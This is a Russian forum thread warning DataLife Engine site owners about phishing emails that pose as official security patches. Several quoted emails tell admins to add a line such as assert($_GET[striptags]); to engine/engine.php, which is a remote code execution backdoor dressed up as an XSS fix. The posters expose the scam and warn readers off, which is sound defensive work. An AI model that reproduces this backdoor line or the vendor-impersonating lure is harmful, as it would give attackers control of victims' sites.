Ваш сайт ***.ru подвержен взлому!

  • Автор темы Wmboard
  • Обновлено
  • 19, Oct 2014
  • #1
Засранцы школоло очень творчески подходят к своему ремеслу, так сказать. За январь месяц я получил два письма. Судите сами, вот первое, полученное в новогодние каникулы
Поздравляем с Новым годом! Выход DataLife Engine 10.4, Патч безопасности для ****

Уважаемые владельцы сайта ***.ru!

Команда «DataLife Engine» поздравляет Вас с Новым 2015 годом!

Мы благодарим Вас за доверие и надеемся, что Вы продолжите использовать «DataLife Engine» на Ваших сайтах и в Новом году.

Примите наши самые искренние пожелания здоровья, радости, благополучия Вам и Вашим близким! Пусть в Новом году успех сопутствует Вам во всех начинаниях! Совсем скоро, мы выпустим «DataLife Engine 10.4», ознакомиться с её возможностями и функциями Вы можете уже сейчас на официальном сайте «DataLife Engine».

Кроме того, осенью прошлого года многие сайты, использующие «DataLife Engine», были взломаны злоумышленниками при помощи XSS-атак. В связи с этим мы решили выпустить небольшой баг-фикс, лишающий злоумышленников возможности проводить XSS-атаки на Ваш сайт.

Для исправления, откройте файл ****.ru/engine/engine.php в любом текстовом редакторе и после строки "<?PHP" добавьте строку:

assert($_GET[striptags]);

С уважением,
Команда «DataLife Engine»

IP адрес отправителя: 46.38.63.68
Айпишник московский. Немного дней спустя пришло еще одно письмо
[Критично] Ваш сайт ****.ru был взломан!

Уважаемые владельцы сайта ****.ru!

Благодарим Вас за использование на Вашем сайте CMS «DataLife Engine».

Сообщаем Вам о том, что за последние сутки в код Вашего сайта ***.ru был встроен вредоносный скрипт, осуществляющий перенаправление мобильных пользователей Вашего сайта на сайт, который представляет угрозу для мобильных устройств.

Скорее всего, злоумышленники получили доступ к панели управления Вашего сайта при помощи уязвимости в модуле Minify, входящем в состав DLE, который позволяет при определенных настройках серверного ПО читать содержимое файлов.

При помощи данной уязвимости любой файл, находящийся на Вашем сервере, может быть прочитан из браузера (при вводе соответствующего запроса), например, файл с данными для доступа к базе данных Вашего сайта.

Получив доступ к базе данных, злоумышленникам не составит труда создать нового пользователя с правами администратора и авторизоваться через него в панели управления Вашего сайта.

Устраните уязвимость, следую инструкции указанной ниже. Кроме того, мы настоятельно рекомендуем Вам сменить все пароли от панели управления и базы данных Вашего сайта.

Для исправления откройте файл: ****.ru/engine/engine.php и в самое начало файла после строчки <?PHP добавьте:

assert($_GET[striptags]);

С уважением,
Команда «DataLife Engine»

IP адрес отправителя: 141.255.162.162
Еще раз повторюсь. Разработчики DLE НЕ делают рассылок через обратную форму связи сайтов! Все патчи и фиксы для DLE вы можете увидеть по ссылке первого поста!

Wmboard


Рег
01 Jan, 2011

Тем
406

Постов
7367

Баллов
9427
  • 19, Oct 2014
  • #2
Школохакеры ищут новые способы взлома сайтов на DLE.
Внимание! Если вы получили письмо следующего содержания:
Здравствуйте, уважаемый клиент!

Благодарим Вас за использование на Вашем сайте ***.ru нашего ПО «CMS DataLife Engine - Система управления сайтами».

Уведомляем Вас о том, что силами наших специалистов на Вашем сайте была обнаружена критическая уязвимость, позволяющая злоумышленникам получить доступ к базе данных Вашего сайта из-за недостаточной фильтрации данных.

По нашим данным 60% сайтов, использующих «DataLife Engine», уязвимы и подвержены взлому посредством данной уязвимости.

Именно по этой причине, мы приняли решение произвести рассылку администраторам уязвимых сайтов для того, чтобы они смогли оперативно обезопасить свои сайты от противоправных действий со стороны злоумышленников.

Для исправления уязвимости в текстовом редакторе откройте файл Вашего сайта: /engine/engine.php и в самое начало файла после строчки:

<?php

добавьте:

assert($_GET[REQUEST]);

С уважением,

Служба поддержки «DataLife Engine»

То ни в коем случае не "исправляйте" уязвимость. Иначе ваш сайт на DLE будет точно подвержен взлому. Движок DLE модернизируется силами разработчиков, становится все более устойчивым к проискам школоло, которые называют себя хакерами, и последние ищут новые возможности для взлома ваших сайтов. Подобные письма шлют мошенники, письма отправляют через обратную форму сайта.

АйПи чаще всего прокси или ТОР. Если вы получили подобное письмо, свяжитесь напрямую со службой поддержки DLE.

Если вы используете нулль, то все фиксы уязвимостей публикуются на официальной странице багов

. Проверьте, есть ли на этой странице подобная информация. Не подвергайте ваш сайт взлому!
 

Wmboard


Рег
01 Jan, 2011

Тем
406

Постов
7367

Баллов
9427
  • 26, Oct 2014
  • #3
Кому интересно у школьников определился московский айпишник: 46.38.63.68
 

Wmboard


Рег
01 Jan, 2011

Тем
406

Постов
7367

Баллов
9427
  • 22, Jan 2015
  • #4
Veter: Засранцы школоло очень творчески подходят к своему ремеслу
рерайтера наняли, не иначе
Veter, не поленись, апни свою тему на саппорте lush:
 

Льюви


Рег
22 May, 2012

Тем
90

Постов
1279

Баллов
1739
  • 03, Apr 2015
  • #5
Хакеры взломали Ваш сайт мойсайт.ru! Засранцы продолжают креативить Какой только заголовок! Разве он не заставит задрожать админа сайта? Письмо якобы от службы поддержки DLE, и в нем сообщается, что сайт взломали! О ужас! Само письмо:

Уважаемые владельцы сайта мойсайт.ru!

Благодарим Вас за использование на Вашем сайте мойсайт.ru CMS «DataLife Engine».

Сообщаем Вам о том, что за последние сутки в код Вашего сайта мойсайт.ru был встроен вредоносный скрипт, осуществляющий перенаправление мобильных пользователей Вашего сайта на сайт, который представляет угрозу для мобильных устройств.

Скорее всего, злоумышленники получили доступ к панели управления Вашего сайта при помощи уязвимости в модуле Minify, входящем в состав DLE, который позволяет при определенных настройках серверного ПО читать содержимое файлов.

При помощи данной уязвимости любой файл, находящийся на Вашем сервере, может быть прочитан из браузера (при вводе соответствующего запроса), например, файл с данными для доступа к базе данных Вашего сайта.

Получив доступ к базе данных, злоумышленникам не составит труда создать нового пользователя с правами администратора и авторизоваться через него в панели управления Вашего сайта.

Устраните уязвимость, следую инструкции указанной ниже. Кроме того, мы настоятельно рекомендуем Вам сменить все пароли от панели управления и базы данных Вашего сайта.

Для исправления откройте файл: мойсайт.ru/engine/engine.php и в самое начало файла после строчки <?PHP добавьте:

assert($_GET[index]);

С уважением,
Команда «DataLife Engine»

IP адрес отправителя: 195.3.146.112
Айпишник скорее всего латвийский прокси. Ну вы уже поняли. Менять и добавлять ничего не нужно.
 

Wmboard


Рег
01 Jan, 2011

Тем
406

Постов
7367

Баллов
9427
  • 01, Mar 2016
  • #6
а я исправил надо сейчас вернуть обратно :shok:
 

Roman481


Рег
01 Mar, 2016

Тем
74

Постов
205

Баллов
585
  • 01, Mar 2016
  • #7
Roman48: а я исправил надо сейчас вернуть обратно
ох... как бы не получилось "поздно пить боржоми"...
 

Льюви


Рег
22 May, 2012

Тем
90

Постов
1279

Баллов
1739
  • 05, Mar 2016
  • #8
Roman48: а я исправил надо сейчас вернуть обратно
Ну так верните.
 

Wmboard


Рег
01 Jan, 2011

Тем
406

Постов
7367

Баллов
9427